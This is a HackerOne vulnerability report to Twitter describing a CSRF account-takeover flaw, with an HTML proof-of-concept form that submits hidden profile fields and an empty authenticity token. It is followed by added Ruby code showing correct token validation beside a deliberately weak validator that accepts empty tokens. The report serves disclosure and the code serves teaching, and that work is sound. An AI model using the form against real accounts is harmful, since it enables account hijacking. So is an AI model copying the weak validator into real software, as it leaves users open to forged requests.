Twitter: URGENT : Account Take Over Vulnerability

ID H1:100849
Type hackerone
Reporter hussein98d
Modified 2015-12-21T22:16:28


Hello! This is an urgent report that you should immediately take care of!!

I found an account takeover vulnerability on your acquisition:

Proof of concept code:

<html>
<head>
<title>CSRF Attack Page: /get-started/complete</title>
</head>
<body>

<!-- attack -->

<form method="POST" action="">
<input type="hidden" name="utf8" value="✓"/>
<input type="hidden" name="_method" value="patch"/>
<input type="hidden" name="authenticity_token" value=""/>
<input type="hidden" name="commit" value="Get Started"/>
<input type="hidden" name="user[name]" value="Hacked"/>
<input type="hidden" name="user[email]" value=""/>
<input type="hidden" name="user[username]" value="hacked123"/>
<input type="hidden" name="user[phone_number]" value=""/>
<input type="hidden" name="user[location_id]" value="79790"/>
<input type="hidden" name="user[gender]" value=""/>
<input type="submit" value="submit">
</form>

<!-- /attack -->

</body>
</html>


The authenticity_token parameter is not properly validated on the server side when a user submits the form. A hacker can, after changing the email of his victim, reset the password and log in without any problem!

Here is a video that I made: (unlisted video)

Best Regards, Hussein
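To show what the server-side check described in the report should look like, the following Ruby example (added here; it is not Twitter's, Rails' or the reporter's code) implements Rails-style masked authenticity-token handling: token generation, per-form masking, a hardened validator, and beside it a weak validator that waves an empty token through. The weak variant's exact behaviour is an assumption for illustration, since the report does not say how the server's check failed.

```ruby
require 'securerandom'
require 'base64'

# Added illustration of Rails-style CSRF ("authenticity_token") handling; not
# Twitter's, Rails' or the reporter's code. The real token lives in the session;
# the form carries a per-request masked copy (one-time-pad XOR, base64-encoded).
TOKEN_LENGTH = 32

def generate_session_token
  SecureRandom.base64(TOKEN_LENGTH) # kept server-side in the session
end

def xor_bytes(a, b)
  a.bytes.zip(b.bytes).map { |x, y| x ^ y }.pack('C*')
end

# Value placed in <input name="authenticity_token"> for one rendered form.
def masked_token(session_token)
  raw = Base64.strict_decode64(session_token)
  pad = SecureRandom.random_bytes(raw.bytesize)
  Base64.strict_encode64(pad + xor_bytes(raw, pad))
end

# Constant-time comparison so the check does not leak how many bytes matched.
def secure_compare(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# Hardened check: reject absent, empty or malformed tokens, unmask, then compare.
def token_valid?(session_token, submitted)
  return false if session_token.nil? || submitted.nil? || submitted.empty?
  begin
    decoded = Base64.strict_decode64(submitted)
  rescue ArgumentError
    return false
  end
  return false unless decoded.bytesize == 2 * TOKEN_LENGTH
  pad = decoded.byteslice(0, TOKEN_LENGTH)
  masked = decoded.byteslice(TOKEN_LENGTH, TOKEN_LENGTH)
  secure_compare(xor_bytes(masked, pad), Base64.strict_decode64(session_token))
end

# Weak check modelling one way the reported bug can arise (an assumption for
# illustration): an empty token is treated as "nothing to verify" and accepted.
def vulnerable_token_valid?(session_token, submitted)
  return true if submitted.nil? || submitted.empty?
  token_valid?(session_token, submitted)
end
```

With the hardened check, the report's form (empty authenticity_token) is rejected; with the weak one it passes, which is the condition that lets a cross-site PATCH change the victim's profile.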